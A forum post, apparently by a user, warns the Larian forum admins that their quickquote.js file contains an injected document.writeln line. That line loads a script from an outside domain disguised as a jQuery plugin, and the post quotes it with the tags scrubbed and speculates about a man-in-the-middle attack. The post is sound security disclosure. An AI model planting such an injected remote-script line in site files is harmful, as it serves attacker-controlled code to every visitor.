Can you at least update the site's js files? Because you don't have any security on your static files, they're easily viewable to the public (true enough for a lot of sites' js files, but generally opens one up even more to hackers).
So I can see a line that shouldn't be there in :
http://larian.com/forums/ubb_js/quickquote.js?v=7.5.8, mid way down:
document.writeln("***** src=\'//om.qqtx.me/jquery.jscroll.min.js\'></*****>");
(script tags scrubbed for safety)
Now, how someone has modified this file is another story, as there could be a MMTM attack going on, especially if the local server's copy is clean, but the one we're downloading as clients is NOT. If you restore with the original UBB script file, does the issue come back?